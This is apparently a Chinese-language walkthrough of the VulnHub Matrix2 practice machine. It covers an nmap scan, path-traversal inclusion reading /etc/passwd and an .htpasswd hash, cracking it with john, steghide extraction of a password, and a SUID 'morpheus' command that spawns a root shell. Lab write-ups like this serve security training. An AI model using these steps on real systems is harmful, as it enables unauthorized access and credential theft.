Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova

环境: VMware 15虚拟机软件
Matrix2靶机IP地址: 192.168.220.159
Kali的IP地址: 192.168.220.155

Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155

ip addr


使用nmap扫描192.168.220.0网段存活的主机,发现Matrix2靶机的IP地址为:192.168.220.159

nmap -sP -T4 192.168.220.0/24 -oN nmap220.sP


使用nmap全面扫描Matrix2靶机并查看已开放的端口,发现已开放80、1337、12320、12321、12322端口

nmap -A -T4 -p- 192.168.220.159 -oN nmap159.A



分别打开相关端口查看页面

http://192.168.220.159/

 https://192.168.220.159:1337/

https://192.168.220.159:12320/

https://192.168.220.159:12321/

https://192.168.220.159:12322/


在12322端口下,发现一个file_view.php文件,但在robots.txt文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞

https://192.168.220.159:12322/robots.txt


https://192.168.220.159:12322/file_view.php

使用BurpSuite抓取数据包,使用POST传参,发现可以包含任意文件,查看/etc/passwd文件

https://192.168.220.159:12322/file_view.php
file=../../../../../../../../../etc/passwd


网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss文件夹比较可疑

file=../../../../../../../../../etc/nginx/sites-available/default
auth_basic_user_file /var/www/p4ss/.htpasswd;


打开p4ss文件夹下的.htpasswd文件发现用户Tr1n17y及加密后的密码

Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0


使用john工具爆破,得到密码admin

john hash.txt
Tr1n17y:admin


打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg

https://192.168.220.159:1337/



打开图片并保存到本地

https://192.168.220.159:1337/h1dd3n.jpg


h1dd3n.jpg图片使用了隐写,使用steghide工具将隐写的文本导出,密码是:n30

steghide --extract -sf h1dd3n.jpg
P4$$w0rd


打开12320端口的靶机控制台,使用n30用户及密码登录

https://192.168.220.159:12320/
n30/ P4$$w0rd


查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权

find / -perm -u=s -type f 2>/dev/null


使用以下命令提到root权限,并找到隐藏的flag

morpheus 'BEGIN {system("/bin/sh")}'

Vulnhub靶机实战——Matrix2相关推荐

  1. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  2. Vulnhub靶机实战——DC-8

    靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...

  3. Vulnhub靶机实战——DC-5

    靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...

  4. 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...

  5. 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...

  6. Vulnhub靶机实战——Matrix3

    下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...

  7. Vulnhub靶机实战——DC-3

    靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...

  8. DC-5 vulnhub靶机实战

    首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...

  9. Vulnhub靶机实战-Forensics

    声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...

最新文章

  1. MySQL开启远程连接权限
  2. 解决报错:gpg: keyserver receive failed: No dirmngr
  3. jedis操作redis(二)
  4. html的canvas标签用法,html5中关于canvas标签用法(绘图)
  5. nrf52840 gpiote如何配置中断输入_西门子S7-200 SMART PID回路控制,配置PID向导,查看项目组件...
  6. 前向传播算法和反向传播算法
  7. K-L变换原理、图像压缩与人脸识别实战(附matlab代码)
  8. 实战tkinter图形界面开发_八款常用的 Python GUI 开发框架推荐
  9. Windows CE如何根据文件名获取其对应文件图标icon
  10. 怎么安装64位JAVA,大师来详解
  11. 基于C++11的高精度多级时间轮定时器
  12. 手机屏幕怎么计算机,怎样把手机屏幕投到电脑
  13. MapReduce计算PMI
  14. 微信小程序点击按钮弹出弹窗_微信小程序带图片弹窗简单实现
  15. PyTorch学习笔记(20) ——激活函数
  16. 灵狐插件与IDEA的集成
  17. 紫光旗下企业正和美光科技谈判存储技术授权及设立合资公司
  18. 文科生能学好数据分析吗
  19. ios传智播客_如何在iOS中创建播客播放列表
  20. 张一鸣带领5万人,做出多款头部产品的秘密是什么?

热门文章

  1. logging多进程报错:PermissionError: [WinError 32] 另一个程序正在使用此文件,进程无法访问
  2. 计算机不断开机,电脑开机不停自检,没完没了,好心人帮忙!
  3. javaweb基于JSP+Servlet房地产客户关系管理系统(CRM) 大作业 课程设计 毕业设计
  4. 【GO】GO Testing源码学习
  5. Proxifier v4* 配置文件路径
  6. mtk驱动camera的调试总结1--原理
  7. 在网站添加客服QQ,打开临时会话框(不用加为好友)
  8. 小米活塞耳机的背后——1MORE
  9. 亚马逊中国站通过ASIN获取商品信息
  10. 李宏毅DLHLP.20.Non-Autoregressive Generation